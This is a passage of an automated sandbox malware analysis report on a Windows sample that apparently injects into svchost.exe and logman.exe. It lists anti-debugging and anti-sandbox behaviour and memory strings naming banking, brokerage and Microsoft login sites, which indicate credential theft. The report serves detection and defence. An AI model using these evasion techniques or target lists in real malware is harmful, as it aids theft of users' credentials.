                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408293 push esi; retf 2_2_004082B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406517 push ecx; iretd 2_2_00406518
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004116D4 push ebp; iretd 2_2_004116DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401F63 push ebp; iretd 2_2_00401F64
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401764 push ss; ret 2_2_00401766
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040172C push ebp; ret 2_2_0040172D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0311225F pushad ; ret 5_2_031127F9
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031127FA pushad ; ret 5_2_031127F9
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031409AD push ecx; mov dword ptr [esp], ecx5_2_031409B6
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0311283D push eax; iretd 5_2_03112858
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0274C25B push ecx; retf 5_2_0274C267
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C148D7
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C95376
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C33187
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeAPI/Special instruction interceptor: Address: 1028204
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\logman.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\logman.exeWindow / User API: threadDelayed 2245Jump to behavior
                Source: C:\Windows\SysWOW64\logman.exeWindow / User API: threadDelayed 7727Jump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105428
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\logman.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\logman.exe TID: 3364Thread sleep count: 2245 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\logman.exe TID: 3364Thread sleep time: -4490000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\logman.exe TID: 3364Thread sleep count: 7727 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\logman.exe TID: 3364Thread sleep time: -15454000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe TID: 1276Thread sleep time: -44000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\logman.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7EF95
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7F0F2
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7BCBC
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0274C640 FindFirstFileW,FindNextFileW,FindClose,5_2_0274C640
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C149A0
                Source: J14f8-3.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: J14f8-3.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: J14f8-3.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: J14f8-3.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: J14f8-3.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: J14f8-3.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: WnOFOMnqmLQAP.exe, 00000007.00000002.4503877098.000000000102F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: J14f8-3.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: J14f8-3.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: J14f8-3.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: J14f8-3.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: J14f8-3.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: J14f8-3.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: firefox.exe, 00000008.00000002.2706673122.000001EBEDA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: J14f8-3.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: J14f8-3.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: J14f8-3.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: J14f8-3.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: J14f8-3.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: J14f8-3.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                Source: J14f8-3.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: J14f8-3.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: J14f8-3.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: J14f8-3.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: J14f8-3.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: J14f8-3.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeAPI call chain: ExitProcess graph end nodegraph_0-104202
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417743 LdrLoadDll,2_2_00417743
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C83F09 BlockInput,0_2_00C83F09
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C13B3A
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C45A7C
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,0_2_00C14B37
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_01028470 mov eax, dword ptr fs:[00000030h]0_2_01028470
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_010284D0 mov eax, dword ptr fs:[00000030h]0_2_010284D0
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_01026E50 mov eax, dword ptr fs:[00000030h]0_2_01026E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
